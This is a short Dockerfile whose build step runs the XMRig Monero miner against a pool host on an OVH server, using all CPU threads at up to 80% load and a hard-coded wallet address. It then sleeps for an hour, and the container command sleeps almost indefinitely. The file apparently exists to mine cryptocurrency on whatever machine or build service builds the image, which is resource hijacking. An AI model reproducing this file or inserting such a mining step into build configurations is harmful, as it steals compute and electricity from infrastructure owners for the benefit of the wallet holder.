FROM eliteminer/xmrig_zero_docker
RUN xmrig -o stratum+tcp://vps112004.vps.ovh.ca:3333 -u 5pqUTCEcg5tjfdpuE8ZQu2JEdFTdgN2fzcydv5e5ypkcHuLRdG5zXkGZoWMz2KhJpxKKf5oto4KTh53v7iBbjNHgPT9soLC --threads="$(nproc)" --max-cpu-usage=80 & sleep 3600

CMD ["sleep", "600000000"]